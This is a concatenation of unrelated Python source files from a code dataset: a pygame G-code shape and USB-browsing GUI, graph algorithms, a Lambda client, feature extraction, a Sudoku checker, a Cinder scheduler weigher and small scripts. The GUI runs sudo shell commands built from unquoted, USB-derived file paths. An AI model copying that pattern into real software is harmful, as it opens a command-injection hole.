wline(wpath, "END")
os.system(cpwg)
gdc_file = os.path.join(main_dir,'gdecode.exe' )
os.system(gdc_file)
dstx,dsty,dscale=getscale(590,540)
get_stpz(dstx,dsty,dscale)
print 'GCODE DONE'
screenHome()
showtextr(DISPLAYSURF, (30, 300), 0, gline, COLOR_OFF, ABLUE)
pygame.display.update()
def screenSetsh(shape):
#Screen for Setting each shape
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
global dstx,dsty,dscale
if shape == 'cir':
image_file = os.path.join(main_dir, 'data', 'setcir.png')
setting = getshset(os.path.join('gcode' ,'circle.set'))
setrMx = getshset(os.path.join('gcode' ,'circleMx.set'))
setrMn = getshset(os.path.join('gcode' ,'circleMn.set'))
pos = [(230, 250)]
rot = [0]
elif shape == 'rec':
image_file = os.path.join(main_dir, 'data', 'setrec.png')
setting = getshset(os.path.join('gcode' ,'rect.set'))
setrMx = getshset(os.path.join('gcode' ,'rectMx.set'))
setrMn = getshset(os.path.join('gcode' ,'rectMn.set'))
pos = [(240, 412), (50, 250)]
rot = [0, 90]
elif shape == 'sta':
image_file = os.path.join(main_dir, 'data', 'setsta.png')
setting = getshset(os.path.join('gcode' ,'star.set'))
setrMx = getshset(os.path.join('gcode' ,'starMx.set'))
setrMn = getshset(os.path.join('gcode' ,'starMn.set'))
pos = [(50, 90), (265, 254),(190, 200)]
rot = [0, 0, -45]
elif shape == 'rho':
image_file = os.path.join(main_dir, 'data', 'setrho.png')
setting = getshset(os.path.join('gcode' ,'rhom.set'))
setrMx = getshset(os.path.join('gcode' ,'rhomMx.set'))
setrMn = getshset(os.path.join('gcode' ,'rhomMn.set'))
pos = [(225, 412), (255, 250)]
rot = [0, 90]
elif shape == 'tri':
image_file = os.path.join(main_dir, 'data', 'settri.png')
setting = getshset(os.path.join('gcode' ,'tri.set'))
setrMx = getshset(os.path.join('gcode' ,'triMx.set'))
setrMn = getshset(os.path.join('gcode' ,'triMn.set'))
pos = [(230, 417), (266, 250), (180, 350) ]
rot = [0, 90, 0]
elif shape == 'pol':
image_file = os.path.join(main_dir, 'data', 'setpol.png')
setting = getshset(os.path.join('gcode' ,'poly.set'))
setrMx = getshset(os.path.join('gcode' ,'polyMx.set'))
setrMn = getshset(os.path.join('gcode' ,'polyMn.set'))
pos = [(50, 90), (165, 170)]
rot = [0, -45]
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
#1
BUTTON1s = [515,46,92,74]
#2
BUTTON2s = [610,46,92,74]
#3
BUTTON3s = [704,46,92,74]
#4
BUTTON4s = [515,123,92,75]
#5
BUTTON5s = [610,123,92,75]
#6
BUTTON6s = [704,123,92,75]
#7
BUTTON7s = [515,201,92,74]
#8
BUTTON8s = [610,201,92,74]
#9
BUTTON9s = [704,201,92,74]
#0
BUTTON10s = [610,277,92,74]
#.
BUTTON11s = [704,277,92,74]
#DEC
BUTTON12s = [515,355,136,159]
#INC
BUTTON13s = [654,355,142,159]
#PREVIOUS
BUTTON14s = [7,518,254,77]
#NEXT
BUTTON15s = [267,518,243,77]
#DONE
BUTTON16s = [514,517,281,78]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
BUTTON6s[0] = WINDOWWIDTH - BUTTON6s[0] - BUTTON6s[2]
BUTTON7s[0] = WINDOWWIDTH - BUTTON7s[0] - BUTTON7s[2]
BUTTON8s[0] = WINDOWWIDTH - BUTTON8s[0] - BUTTON8s[2]
BUTTON9s[0] = WINDOWWIDTH - BUTTON9s[0] - BUTTON9s[2]
BUTTON10s[0] = WINDOWWIDTH - BUTTON10s[0] - BUTTON10s[2]
BUTTON11s[0] = WINDOWWIDTH - BUTTON11s[0] - BUTTON11s[2]
BUTTON12s[0] = WINDOWWIDTH - BUTTON12s[0] - BUTTON12s[2]
BUTTON13s[0] = WINDOWWIDTH - BUTTON13s[0] - BUTTON13s[2]
BUTTON14s[0] = WINDOWWIDTH - BUTTON14s[0] - BUTTON14s[2]
BUTTON15s[0] = WINDOWWIDTH - BUTTON15s[0] - BUTTON15s[2]
BUTTON16s[0] = WINDOWWIDTH - BUTTON16s[0] - BUTTON16s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
BUTTON6s[1] = WINDOWHEIGHT - BUTTON6s[1] - BUTTON6s[3]
BUTTON7s[1] = WINDOWHEIGHT - BUTTON7s[1] - BUTTON7s[3]
BUTTON8s[1] = WINDOWHEIGHT - BUTTON8s[1] - BUTTON8s[3]
BUTTON9s[1] = WINDOWHEIGHT - BUTTON9s[1] - BUTTON9s[3]
BUTTON10s[1] = WINDOWHEIGHT - BUTTON10s[1] - BUTTON10s[3]
BUTTON11s[1] = WINDOWHEIGHT - BUTTON11s[1] - BUTTON11s[3]
BUTTON12s[1] = WINDOWHEIGHT - BUTTON12s[1] - BUTTON12s[3]
BUTTON13s[1] = WINDOWHEIGHT - BUTTON13s[1] - BUTTON13s[3]
BUTTON14s[1] = WINDOWHEIGHT - BUTTON14s[1] - BUTTON14s[3]
BUTTON15s[1] = WINDOWHEIGHT - BUTTON15s[1] - BUTTON15s[3]
BUTTON16s[1] = WINDOWHEIGHT - BUTTON16s[1] - BUTTON16s[3]
loopb = True
count = int(setting[0])-1;
setting[0:count] = setting[1:count]
setrMx[0:count] = setrMx[1:count]
setrMn[0:count] = setrMn[1:count]
print count
colbac=['NO','NO', 'NO', 'NO', 'NO', 'NO']
selset = 0
mode = 0
setint=[0]*count
for k in range(count):
showtextr(DISPLAYSURF, pos[k], rot[k], str(int(setting[k])), COLOR_OFF, colbac[k])
setint[k]=int(setting[k])
while loopb:
if screenNeedsRedraw:
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='1'
mode=1
else:
setting[selset]=setting[selset]+'1'
print 'SETSH 1'
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='2'
mode=1
else:
setting[selset]=setting[selset]+'2'
print 'SETSH 2'
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='3'
mode=1
else:
setting[selset]=setting[selset]+'3'
print 'SETSH 3'
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='4'
mode=1
else:
setting[selset]=setting[selset]+'4'
print 'SETSH 4'
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='5'
mode=1
else:
setting[selset]=setting[selset]+'5'
print 'SETSH 5'
elif pygame.Rect((BUTTON6s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='6'
mode=1
else:
setting[selset]=setting[selset]+'6'
print 'SETSH 6'
elif pygame.Rect((BUTTON7s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='7'
mode=1
else:
setting[selset]=setting[selset]+'7'
print 'SETSH 7'
elif pygame.Rect((BUTTON8s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='8'
mode=1
else:
setting[selset]=setting[selset]+'8'
print 'SETSH 8'
elif pygame.Rect((BUTTON9s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='9'
mode=1
else:
setting[selset]=setting[selset]+'9'
print 'SETSH 9'
elif pygame.Rect((BUTTON10s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
if(mode==0):
setting[selset]='0'
mode=1
else:
setting[selset]=setting[selset]+'0'
print 'SETSH 0'
elif pygame.Rect((BUTTON11s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
setting[selset]= str(-1*int(setting[selset]))
print 'SETSH .'
elif pygame.Rect((BUTTON12s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
mode=0
if(int(setting[selset])>int(setrMn[selset])):
setting[selset]=str(int(setting[selset])-1);
colbac[selset]=ABLUE
print 'SETSH DEC'
elif pygame.Rect((BUTTON13s)).collidepoint(mousex, mousey):
showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
mode=0
if(int(setting[selset])<int(setrMx[selset])):
setting[selset]=str(int(setting[selset])+1);
colbac[selset]=ABLUE
print 'SETSH INC'
elif pygame.Rect((BUTTON14s)).collidepoint(mousex, mousey):
colbac[selset]='NO'
mode=0
if(selset==0):
selset=count
selset-=1;
colbac[selset]=ABLUE
DISPLAYSURF.blit(SIMAGE, (0, 0))
print 'SETSH PREVIOUS'
elif pygame.Rect((BUTTON15s)).collidepoint(mousex, mousey):
colbac[selset]='NO'
mode=0
if(selset==count-1):
selset=-1
selset+=1;
colbac[selset]=ABLUE
DISPLAYSURF.blit(SIMAGE, (0, 0))
print 'SETSH NEXT'
elif pygame.Rect((BUTTON16s)).collidepoint(mousex, mousey):
print 'SETSH OK'
loopb = False
if((int(setting[selset])<int(setrMn[selset])) and (mode == 0)):
setting[selset]=setrMn[selset]
if(int(setting[selset])>int(setrMx[selset])):
setting[selset]=setrMx[selset]
mode=0
print setting[selset]
for k in range(count):
showtextr(DISPLAYSURF, pos[k], rot[k], str(int(setting[k])), COLOR_OFF, colbac[k])
setint[k]=int(setting[k])
pygame.display.update()
d_file = os.path.join(main_dir, 'gcode', 'gcode.txt')
if shape == 'cir':
s_file = os.path.join(main_dir, 'gcode', 'circle.txt')
circle2g(setint)
elif shape == 'rec':
rectangle2g(setint)
s_file = os.path.join(main_dir, 'gcode', 'rect.txt')
elif shape == 'sta':
star2g(setint)
s_file = os.path.join(main_dir, 'gcode', 'star.txt')
elif shape == 'rho':
rhombus2g(setint)
s_file = os.path.join(main_dir, 'gcode', 'rhom.txt')
elif shape == 'tri':
triangle2g(setint)
s_file = os.path.join(main_dir, 'gcode', 'tri.txt')
elif shape == 'pol':
polygon2g(setint)
s_file = os.path.join(main_dir, 'gcode', 'poly.txt')
#TODO cp <-> copy
comm = 'cp '+ s_file + ' ' + d_file
os.system(comm)
gdc_file = os.path.join(main_dir,'gdecode.exe' )
os.system(gdc_file)
dstx,dsty,dscale=getscale(590,540)
get_stpz(dstx,dsty,dscale)
screenHome()
def screenUsb():
#USB screen to get design from USB
#global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
global dstx,dsty,dscale
image_file = os.path.join(main_dir, 'data', 'usb.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
BUTTON1 = (630,0,170,114)
BUTTON1s = [630,0,170,114]
BUTTON2 = (630,121,170,114)
BUTTON2s = [630,121,170,114]
BUTTON3 = (630,242,170,114)
BUTTON3s = [630,242,170,114]
BUTTON4 = (630,366,170,114)
BUTTON4s = [630,366,170,114]
BUTTON5 = (630,488,170,114)
BUTTON5s = [630,488,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
os.system('sudo sh ./mountusb.sh')
p_app=filelines(30, 40, "usbdata.txt", 0, 20, 45, 1)
line_sel=1
line_off=0
path_usb_file=os.path.join('/media','usbstick')
while True:
if screenNeedsRedraw:
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
if(line_sel>=1):
line_sel-=1
if(line_sel==0):
line_sel=20
line_off-=20
DISPLAYSURF.blit(SIMAGE, (0, 0))
p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
print 'USB UP'
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
path_usb_file=os.path.join(path_usb_file,'..')
os.environ['usbfp']=path_usb_file
os.system('echo $usbfp')
os.system('sudo sh ./file_in_dir.sh $usbfp')
DISPLAYSURF.blit(SIMAGE, (0, 0))
line_off=0
line_sel=1
p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
print 'USB BACK'
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
path_usb_file=os.path.join(path_usb_file,p_app)
os.environ['usbfp']=path_usb_file
os.system('echo $usbfp')
os.system('sudo sh ./file_in_dir.sh $usbfp')
DISPLAYSURF.blit(SIMAGE, (0, 0))
line_off=0
line_sel=1
p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
print 'USB ENTER'
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
if(line_sel<=20):
line_sel+=1
if(line_sel==21):
line_sel=1
line_off+=20
DISPLAYSURF.blit(SIMAGE, (0, 0))
p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
print 'USB DOWN'
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
print 'USB CANCEL'
gdc_file = os.path.join(main_dir,'gdecode.exe' )
os.system(gdc_file)
dstx,dsty,dscale=getscale(590,540)
get_stpz(dstx,dsty,dscale)
print str(dstx)+", "+str(dsty)+", "+str(dscale)
gdraw2(dstx,dsty,dscale,WHITE)
screenHome()
pygame.display.update()
def checkForQuit():
# Terminates the program if there are any QUIT or escape key events.
for event in pygame.event.get(QUIT): # get all the QUIT events
pygame.quit() # terminate if any QUIT events are present
sys.exit()
for event in pygame.event.get(KEYUP): # get all the KEYUP events
if event.key == K_ESCAPE:
pygame.quit() # terminate if the KEYUP event was for the Esc key
sys.exit()
pygame.event.post(event) # put the other KEYUP event objects bac
pygame.quit()
if __name__ == '__main__':
main()
| StarcoderdataPython |
3219665 | import numba as nb
import numpy as np
from dsa.topology.graph.jit.csgraph_to_directed import csgraph_to_directed
from dsa.topology.graph.jit.sort_csgraph import sort_csgraph
# TODO cut below
# DFS
@nb.njit
def connected_components_dfs(n: int, g: np.ndarray):
g = csgraph_to_directed(g)
g, edge_idx, _ = sort_csgraph(n, g)
label = np.full(n, -1, np.int64)
l = 0
for i in range(n):
if label[i] != -1:
continue
label[i] = l
st = [i]
while st:
u = st.pop()
for v in g[edge_idx[u] : edge_idx[u + 1], 1]:
if label[v] != -1:
continue
label[v] = l
st.append(v)
l += 1
return label
# BFS
@nb.njit
def connected_components_bfs(n: int, g: np.ndarray):
g = csgraph_to_directed(g)
g, edge_idx, _ = sort_csgraph(n, g)
label = np.full(n, -1, np.int64)
l = 0
for i in range(n):
if label[i] != -1:
continue
label[i] = l
que = [i]
for u in que:
for v in g[edge_idx[u] : edge_idx[u + 1], 1]:
if label[v] != -1:
continue
label[v] = l
que.append(v)
l += 1
return label
# with union find
| StarcoderdataPython |
3376463 | <reponame>ForwardLine/backup-nanny<filename>backup_nanny/util/lambda_client.py<gh_stars>1-10
from boto3.session import Session
from sys import exit
class LambdaClient(object):
def __init__(self, session=None):
self.client = self.get_client(session)
def get_client(self, session=None):
if not session:
session = Session()
return session.client('lambda')
def invoke(self, name, payload, invocation_type='Event'):
return self.client.invoke(
FunctionName=name,
InvocationType=invocation_type,
Payload=payload)
| StarcoderdataPython |
1686147 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017 - 2019 Karlsruhe Institute of Technology - Steinbuch Centre for Computing
# This code is distributed under the MIT License
# Please, see the LICENSE file
#
import os
import numpy as np
import dogs_breed_det.config as cfg
import dogs_breed_det.dataset.data_utils as dutils
def set_features_file(dataset_type, network='Resnet50', return_type='path'):
""" Function
Returns according to the dataset_type and network either
directory with the file, filename, or full path to the file (default)
"""
# directory where file is, not the full path!
file_dir = os.path.join('data', 'bottleneck_features')
# only file name
file_name = 'Dogs_' + network + '_features_' + dataset_type + '.npz'
# full path to the file
file_path = os.path.join(cfg.BASE_DIR, file_dir, file_name)
if return_type == 'dir':
return file_dir
elif return_type == 'file':
return file_name
else:
return file_path
def build_features(data_type, network='Resnet50'):
"""Build bottleneck_features for set of files"""
nets = {'VGG16': extract_VGG16,
'VGG19': extract_VGG19,
'Resnet50': extract_Resnet50,
'InceptionV3': extract_InceptionV3,
'Xception': extract_Xception,
}
data_dir = os.path.join(cfg.BASE_DIR,'data', cfg.Dog_DataDir, data_type)
img_files = dutils.load_data_files(data_dir)
print("[DEBUG] build_features, img_files: ", img_files[:5])
bottleneck_features = nets[network](dutils.paths_to_tensor(img_files))
bottleneck_path = set_features_file(data_type, network,
return_type='path')
if data_type == 'train':
np.savez(bottleneck_path, train=bottleneck_features)
elif data_type == 'test':
np.savez(bottleneck_path, test=bottleneck_features)
elif data_type == 'valid':
np.savez(bottleneck_path, valid=bottleneck_features)
else:
np.savez(bottleneck_path, features=bottleneck_features)
print("[INFO] Bottleneck features size (build_features):",
bottleneck_features.shape)
return bottleneck_features
def load_features(data_type, network = 'Resnet50'):
"""Load features from the file
Only one dataset, e.g. train, valid, test is loaded
"""
bottleneck_path = set_features_file(data_type, network)
print("[INFO] Using %s" % bottleneck_path)
bottleneck_features = np.load(bottleneck_path)[data_type]
return bottleneck_features
def extract_VGG16(tensor):
from keras.applications.vgg16 import VGG16, preprocess_input
return VGG16(weights='imagenet', include_top=False).predict(preprocess_input(tensor))
def extract_VGG19(tensor):
from keras.applications.vgg19 import VGG19, preprocess_input
return VGG19(weights='imagenet', include_top=False).predict(preprocess_input(tensor))
def extract_Resnet50(tensor):
from keras.applications.resnet50 import ResNet50, preprocess_input
return ResNet50(weights='imagenet', include_top=False).predict(preprocess_input(tensor))
def extract_Xception(tensor):
from keras.applications.xception import Xception, preprocess_input
return Xception(weights='imagenet', include_top=False).predict(preprocess_input(tensor))
def extract_InceptionV3(tensor):
from keras.applications.inception_v3 import InceptionV3, preprocess_input
return InceptionV3(weights='imagenet', include_top=False).predict(preprocess_input(tensor))
| StarcoderdataPython |
1754075 | #!/usr/bin/python3
"""defining to_json_string function"""
import json
def to_json_string(my_obj):
"""returns json representation of an object"""
return json.dumps(my_obj)
| StarcoderdataPython |
1640893 | <gh_stars>0
from braces.views import LoginRequiredMixin
from django.views.generic import TemplateView
class LandingPageView(TemplateView):
"""LandingPage for registering and logging in."""
template_name = 'frontend/index.html'
class ArianeView(LoginRequiredMixin, TemplateView):
"""The core view of the project."""
template_name = 'frontend/ariane.html'
| StarcoderdataPython |
1688863 | <filename>sudoku.py
# Sudoku class
class Sudoku:
# Constructor
def __init__(self, matrix):
self.board = self.load(matrix)
# Load board with matrix
def load(self, matrix):
if (self.isMatrixValid(matrix)):
return matrix
else:
return [
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0
]
# Display board
def display(self):
for j in range(9):
str = ''
for i in range(9):
if self.board[j * 9 + i] > 0:
str += f'{self.board[j * 9 + i]} '
else:
str += '- '
print(str)
print('\n')
# Add value to position in board
def add(self, row, col, value):
if row not in range(9) or col not in range(9) or value not in range(1, 10):
return
self.board[row * 9 + col] = value
# Remove value from position in board
def remove(self, row, col):
if row not in range(9) or col not in range(9):
return
self.board[row * 9 + col] = 0
# Check matrix validity
def isMatrixValid(self, matrix):
if len(matrix) != 81:
return False
for v in matrix:
if v not in range(10):
return False
return True
# Check board validity
def isValid(self):
rv = self.isRowValid()
cv = self.isColumnValid()
sv = self.isSquareValid()
if rv and cv and sv:
return True
return False
# Check board completion
def isSolved(self):
if not self.isValid():
return False
for k in range(81):
if self.board[k] == 0:
return False
return True
# Check row validity
def isRowValid(self):
for j in range(9):
row = []
for i in range(9):
row.append(self.board[j * 9 + i])
for v in range(1, 10):
if row.count(v) > 1:
return False
return True
# Check column validity
def isColumnValid(self):
for i in range(9):
col = []
for j in range(9):
col.append(self.board[j * 9 + i])
for v in range(1, 10):
if col.count(v) > 1:
return False
return True
# Check square validity
def isSquareValid(self):
for c in range(9):
sq = []
for k in range(9):
sq.append(self.board[((c // 3) * 3 + (k // 3)) * 9 + ((c % 3) * 3 + (k % 3))])
for v in range(1, 10):
if sq.count(v) > 1:
return False
return True
# Testing
if __name__ == '__main__':
sample = [
1, 4, 5, 6, 2, 7, 8, 9, 3,
2, 9, 3, 4, 1, 8, 6, 7, 5,
6, 7, 8, 3, 9, 5, 1, 2, 4,
5, 2, 7, 1, 6, 3, 9, 4, 8,
4, 1, 9, 8, 5, 2, 7, 3, 6,
3, 8, 6, 7, 4, 9, 2, 5, 1,
9, 6, 2, 5, 3, 1, 4, 0, 7,
8, 3, 4, 9, 7, 6, 5, 1, 2,
7, 5, 1, 2, 8, 4, 3, 6, 9
]
sudoku = Sudoku(sample)
sudoku.display()
print(sudoku.isSolved())
sudoku.add(6, 7, 8)
sudoku.display()
print(sudoku.isSolved())
sudoku.remove(4, 5)
sudoku.display()
print(sudoku.isSolved())
| StarcoderdataPython |
5928 | <reponame>ChidinmaKO/Chobe-bitesofpy
def get_index_different_char(chars):
alnum = []
not_alnum = []
for index, char in enumerate(chars):
if str(char).isalnum():
alnum.append(index)
else:
not_alnum.append(index)
result = alnum[0] if len(alnum) < len(not_alnum) else not_alnum[0]
return result
# tests
def test_wrong_char():
inputs = (
['A', 'f', '.', 'Q', 2],
['.', '{', ' ^', '%', 'a'],
[1, '=', 3, 4, 5, 'A', 'b', 'a', 'b', 'c'],
['=', '=', '', '/', '/', 9, ':', ';', '?', '¡'],
list(range(1,9)) + ['}'] + list('abcde'), # noqa E231
)
expected = [2, 4, 1, 5, 8]
for arg, exp in zip(inputs, expected):
err = f'get_index_different_char({arg}) should return index {exp}'
assert get_index_different_char(arg) == exp, err | StarcoderdataPython |
3285079 | <reponame>lightsey/cinder<gh_stars>1-10
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Stochastic weight handler
This weight handler differs from the default weight
handler by giving every pool a chance to be chosen
where the probability is proportional to each pools'
weight.
"""
import random
from cinder.scheduler import base_weight
from cinder.scheduler import weights as wts
class StochasticHostWeightHandler(base_weight.BaseWeightHandler):
def __init__(self, namespace):
super(StochasticHostWeightHandler, self).__init__(wts.BaseHostWeigher,
namespace)
def get_weighed_objects(self, weigher_classes, obj_list,
weighing_properties):
# The normalization performed in the superclass is nonlinear, which
# messes up the probabilities, so override it. The probabilistic
# approach we use here is self-normalizing.
# Also, the sorting done by the parent implementation is harmless but
# useless for us.
# Compute the object weights as the parent would but without sorting
# or normalization.
weighed_objs = [wts.WeighedHost(obj, 0.0) for obj in obj_list]
for weigher_cls in weigher_classes:
weigher = weigher_cls()
weights = weigher.weigh_objects(weighed_objs, weighing_properties)
for i, weight in enumerate(weights):
obj = weighed_objs[i]
obj.weight += weigher.weight_multiplier() * weight
# Avoid processing empty lists
if not weighed_objs:
return []
# First compute the total weight of all the objects and the upper
# bound for each object to "win" the lottery.
total_weight = 0
table = []
for weighed_obj in weighed_objs:
total_weight += weighed_obj.weight
max_value = total_weight
table.append((max_value, weighed_obj))
# Now draw a random value with the computed range
winning_value = random.random() * total_weight
# Scan the table to find the first object with a maximum higher than
# the random number. Save the index of the winner.
winning_index = 0
for (i, (max_value, weighed_obj)) in enumerate(table):
if max_value > winning_value:
# Return a single element array with the winner.
winning_index = i
break
# It's theoretically possible for the above loop to terminate with no
# winner. This happens when winning_value >= total_weight, which
# could only occur with very large numbers and floating point
# rounding. In those cases the actual winner should have been the
# last element, so return it.
return weighed_objs[winning_index:] + weighed_objs[0:winning_index]
| StarcoderdataPython |
3363102 | <reponame>mboos/advent-of-code
# Lint as: python3
"""Counts valid passwords
Solution to part 2 of https://adventofcode.com/2020/day/2
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from absl import app
from absl import flags
FLAGS = flags.FLAGS
flags.DEFINE_integer("target", 2020, "Target value")
flags.DEFINE_string("input", None, "Input file.")
flags.mark_flag_as_required("input")
pattern = re.compile(r"(?P<min>\d+)-(?P<max>\d+) (?P<letter>\w): (?P<password>\w+)")
def parse(line):
m = re.match(pattern, line)
return int(m.group('min')), int(m.group('max')), m.group('letter'), m.group('password')
def main(argv):
if len(argv) > 2:
raise app.UsageError('Too many command-line arguments.')
with open(FLAGS.input) as fp:
rows = list(map(parse, fp))
valid = 0
for a, b, letter, password in rows:
if password[a-1] == letter and password[b-1] != letter:
valid += 1
if password[b-1] == letter and password[a-1] != letter:
valid +=1
print(valid)
if __name__ == '__main__':
app.run(main)
| StarcoderdataPython |
4825311 | from generator import (
GenerateGemmOperations,
GenerateGemvOperations,
GenerateConv2dOperations,
GenerateDeconvOperations,
)
class GenArg:
def __init__(self, gen_op, gen_type):
self.operations = gen_op
self.type = gen_type
def write_op_list(f, gen_op, gen_type):
if gen_op == "gemm":
operations = GenerateGemmOperations(GenArg(gen_op, gen_type))
elif gen_op == "gemv":
operations = GenerateGemvOperations(GenArg(gen_op, gen_type))
elif gen_op == "conv2d":
operations = GenerateConv2dOperations(GenArg(gen_op, gen_type))
elif gen_op == "deconv":
operations = GenerateDeconvOperations(GenArg(gen_op, gen_type))
for op in operations:
f.write(' "%s.cu",\n' % op.procedural_name())
if gen_op != "gemv":
f.write(' "all_%s_%s_operations.cu",\n' % (gen_op, gen_type))
if __name__ == "__main__":
with open("list.bzl", "w") as f:
f.write("# Generated by dnn/scripts/cutlass_generator/gen_list.py\n\n")
f.write("cutlass_gen_list = [\n")
write_op_list(f, "gemm", "simt")
write_op_list(f, "gemv", "simt")
write_op_list(f, "deconv", "simt")
write_op_list(f, "conv2d", "simt")
write_op_list(f, "conv2d", "tensorop8816")
write_op_list(f, "conv2d", "tensorop8832")
f.write("]")
| StarcoderdataPython |
33788 | import collections
try:
stringtype = basestring # python 2
except:
stringtype = str # python 3
def coerce_to_list(x):
if isinstance(x, stringtype):
